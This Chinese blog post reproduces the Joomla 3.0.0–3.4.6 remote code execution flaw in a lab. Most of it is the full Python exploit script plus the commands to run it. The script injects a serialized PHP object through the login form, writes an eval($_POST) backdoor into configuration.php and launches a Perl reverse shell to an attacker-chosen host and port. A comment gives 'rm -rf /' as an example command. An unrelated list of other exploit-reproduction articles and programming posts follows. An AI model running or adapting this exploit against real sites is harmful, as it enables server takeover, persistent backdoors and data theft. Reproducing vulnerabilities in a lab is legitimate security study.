Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

一、漏洞描述

Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。

二、漏洞影响版本

Joomla 3.0.0-3.4.6

三、漏洞环境搭建

靶机:win7(使用phpstudy搭建环境)    ip:192.168.10.171

攻击机:kali    ip:192.168.10.140

1、下载joomla 3.4.6下载地址:https://downloads.joomla.org/cms/joomla3/3-4-6

2、设置网站名、管理员邮箱、用户名、密码等

  

3、连接数据库

  

4、安装完成之后,需要删除安装目录

  

5、成功安装

  

四、漏洞复现

1、使用脚本进行验证,下图说明漏洞存在(显示”Vulnerable”证明存在漏洞)

python3 joomla3.4.6-rce.py -t  http://192.168.10.171/joomla/

  

2、脚本内容(或者见joomla3.4.6-rce.py文件)

#!/usr/bin/env python3

import requests

from bs4 import BeautifulSoup

from colorama import init

import sys

import string

import random

import argparse

from termcolor import colored

init(autoreset=True)

PROXS = {'http':'127.0.0.1:8080'}

PROXS = {}

def random_string(stringLength):

        letters = string.ascii_lowercase

        return ''.join(random.choice(letters) for i in range(stringLength))

backdoor_param = random_string()

def print_info(str):

        print(colored("[*] " + str,"cyan"))

def print_ok(str):

        print(colored("[+] "+ str,"green"))

def print_error(str):

        print(colored("[-] "+ str,"red"))

def print_warning(str):

        print(colored("[!!] " + str,"yellow"))

def get_token(url, cook):

        token = ''

        resp = requests.get(url, cookies=cook, proxies = PROXS)

        html = BeautifulSoup(resp.text,'html.parser')

        # csrf token is the last input

        for v in html.find_all('input'):

                csrf = v

        csrf = csrf.get('name')

        return csrf

def get_error(url, cook):

        resp = requests.get(url, cookies = cook, proxies = PROXS)

        if 'Failed to decode session object' in resp.text:

                #print(resp.text)

                return False

        #print(resp.text)

        return True

def get_cook(url):

        resp = requests.get(url, proxies=PROXS)

        #print(resp.cookies)

        return resp.cookies

def gen_pay(function, command):

        # Generate the payload for call_user_func('FUNCTION','COMMAND')

        template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'

        #payload =  command + ' || $a=\'http://wtf\';'

        payload =  'http://l4m3rz.l337/;' + command

        # Following payload will append an eval() at the enabled of the configuration file

        #payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'

        function_len = len(function)

        final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))

        return final

def make_req(url , object_payload):

        # just make a req with object

        print_info('Getting Session Cookie ..')

        cook = get_cook(url)

        print_info('Getting CSRF Token ..')

        csrf = get_token( url, cook)

        user_payload = '\\0\\0\\0' *

        padding = 'AAA' # It will land at this padding

        working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'

        clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects

        inj_object = '";'

        inj_object += object_payload

        inj_object += 's:6:"return";s:102:' # end the object with the 'return' part

        password_payload = padding + inj_object

        params = {

            'username': user_payload,

            'password': password_payload,

            'option':'com_users',

            'task':'user.login',

            csrf :''

            }

        print_info('Sending request ..')

        resp  = requests.post(url, proxies = PROXS, cookies = cook,data=params)

        return resp.text

def get_backdoor_pay():

        # This payload will backdoor the the configuration .PHP with an eval on POST request

        function = 'assert'

        template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'

        # payload =  command + ' || $a=\'http://wtf\';'

        # Following payload will append an eval() at the enabled of the configuration file

        payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'

        function_len = len(function)

        final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))

        return final

def check(url):

        check_string = random_string()

        target_url = url + 'index.php/component/users'

        html = make_req(url, gen_pay('print_r',check_string))

        if check_string in html:

                return True

        else:

                return False

def ping_backdoor(url,param_name):

        res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)

        if 'PWNED' in res.text:

                return True

        return False

def execute_backdoor(url, payload_code):

        # Execute PHP code from the backdoor

        res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)

        print(res.text)

def exploit(url, lhost, lport):

        # Exploit the target

        # Default exploitation will append en eval function at the end of the configuration.pphp

        # as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')

        # e.g. get_payload('system','rm -rf /')

        # First check that the backdoor has not been already implanted

        target_url = url + 'index.php/component/users'

        make_req(target_url, get_backdoor_pay())

        if ping_backdoor(url, backdoor_param):

                print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)

                print_info('Now it\'s time to reverse, trying with a system + perl')

                execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')

if __name__ == '__main__':

        parser = argparse.ArgumentParser()

        parser.add_argument('-t','--target',required=True,help='Joomla Target')

        parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')

        parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')

        parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')

        parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')

        args = vars(parser.parse_args())

        url = args['target']

        if(check(url)):

                print_ok('Vulnerable')

                if args['exploit']:

                        exploit(url, args['lhost'], args['lport'])

                else:

                        print_info('Use --exploit to exploit it')

        else:

                print_error('Seems NOT Vulnerable ;/')

3、使用exp生成一个木马,下图可以看到成功在目标生成木马

python3 joomla3.4.6-rce.py -t  http://192.168.10.171/joomla/ --exploit --lhost 192.168.10.140 --lport 9999    // 用于监听的主机的ip和一个不占用的端口

  

4、在靶机上查看configuration.php文件,发现在末尾被写入木马

  

5、使用菜刀连接

  

 五、修复方法

1、更新至最新版本3.9.12

----------------------------------------------------------------------------------------

参考: https://www.secpulse.com/archives/115192.html

https://blog.csdn.net/weixin_43886632/article/details/102461974

exp: https://github.com/kiks7/rusty_joomla_rce

Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现的更多相关文章

  1. Joomla框架搭建&远程代码执行(RCE)漏洞复现

    一.漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.8,官网: https://downloads.joomla.org/,漏洞位于根 ...

  2. Adboe Flash远程代码执行_CVE-2018-4878漏洞复现

    Adboe Flash远程代码执行_CVE-2018-4878漏洞复现 一.漏洞描述 该漏洞可针对windows用户发起定向攻击.攻击者可以诱导用户打开包含恶意Flash代码文件的Microsoft ...

  3. WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现

    WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现 一.漏洞描述 Weblogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限.Oracle 7月 ...

  4. Tomcat CGIServlet enableCmdLineArguments远程代码执行_CVE-2019-0232漏洞复现

    Tomcat CGIServlet enableCmdLineArguments远程代码执行_CVE-2019-0232漏洞复现 一.漏洞描述 该漏洞是由于tomcat CGI将命令行参数传递给Win ...

  5. Apache Druid 远程代码执行 CVE-2021-25646 漏洞复现

    Apache Druid 远程代码执行 CVE-2021-25646 漏洞复现 前言 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供 ...

  6. Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现

    Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现 一.漏洞描述 Free MP3 CD Ripper是一款音频格式转换器.Free MP3 CD Rip ...

  7. windows RDP远程代码执行_CVE-2019-0708漏洞复现

    windows RDP远程代码执行_CVE-2019-0708漏洞复现 一.漏洞概述 2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版 ...

  8. 远程代码执行MS08-067漏洞复现失败过程

    远程代码执行MS08-067漏洞复现失败过程 漏洞描述: 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码. 在微软服务器系统上,攻击者可能未经身份验证即可利用此漏洞运行 ...

  9. F5 BIG-IP 远程代码执行RCE(CVE-2020-5902)复现

    漏洞简介 F5 BIG-IP 是美国``F5公司一款集成流量管理.DNS.出入站规则.web应用防火墙.web网关.负载均衡等功能的应用交付平台. 在F5 BIG-IP产品的流量管理用户页面 (TMU ...

随机推荐

  1. codeforces 793 D. Presents in Bankopolis(记忆化搜索)

    题目链接:http://codeforces.com/contest/793/problem/D 题意:给出n个点m条边选择k个点,要求k个点是联通的而且不成环,而且选的边不能包含选过的边不能包含以前 ...

  2. axios跨域访问eggjs的坑egg-cors egg-passport passport-local session传递问题

    在同一机器上写前端和后端,前端使用webpack-dev-server启动,后端直接在eggjs项目目录下使用npm run dev启动,这种情况下,前端访问后端就是跨域访问.eggjs提供了一个跨域 ...

  3. WoSign新证书系统通过德国Cure53安全测试

    近日,沃通WoSign新证书系统顺利通过德国Cure53白盒子安全测试,并公开发布审计报告总结版. 据悉,根据去年10月份Mozilla提出的整改要求,沃通WoSign投入研发力量高标准严要求地重新开 ...

  4. Java 中的array数组总结之一

    数组:是一个将同种类型的数据存储在存储单元中. 可以用三种方式声明数组: 1.数据类型 标识符[]; int mothDays[]; 2.数据类型 标识符[] = new 数据类型[大小]; int ...

  5. webpack中clean-webpack-plugin插件使用遇到的问题及解决方法

    webpack 会生成文件,然后将这些文件放置在 /dist 文件夹中,但是 webpack 无法追踪到哪些文件是实际在项目中用到的. 通常,在每次构建前清理 /dist 文件夹,是比较推荐的做法,因 ...

  6. 洛谷 P3952时间复杂度 (本地AC测评RE的伪题解)

    [题目描述] 小明正在学习一种新的编程语言 A++,刚学会循环语句的他激动地写了好多程序并 给出了他自己算出的时间复杂度,可他的编程老师实在不想一个一个检查小明的程序, 于是你的机会来啦!下面请你编写 ...

  7. Dijkstra算法详细(单源最短路径算法)

    介绍 对于dijkstra算法,很多人可能感觉熟悉而又陌生,可能大部分人比较了解bfs和dfs,而对dijkstra和floyd算法可能知道大概是图论中的某个算法,但是可能不清楚其中的作用和原理,又或 ...

  8. 使用vitamio长时间播放崩溃的另类处理

    最近公司一个项目在公交站旁边弄一个 广告牌,上面是广告视频,下面是广告图片,都是无限轮播的.要求从早上6点到晚上11点不间断播放.剩余时间为关机状态. 图片部分还好说,就是viewpager弄一个无限 ...

  9. Javaweb设置session过期时间

    在Java Web开发中,Session为我们提供了很多方便,Session是由浏览器和服务器之间维护的.Session超时理解为:浏览器和服务器之间创建了一个Session,由于客户端长时间(休眠时 ...

  10. (三)Spring 高级装配 bean的作用域@Scope

    1.默认情况下,spring通过@Autowared注入的bean是单例的bean,但有些情况是不满足的,例如:购物车,每个会话,或每个用户登录使用的购物车都是独立的 spring的定义的作用域: a ...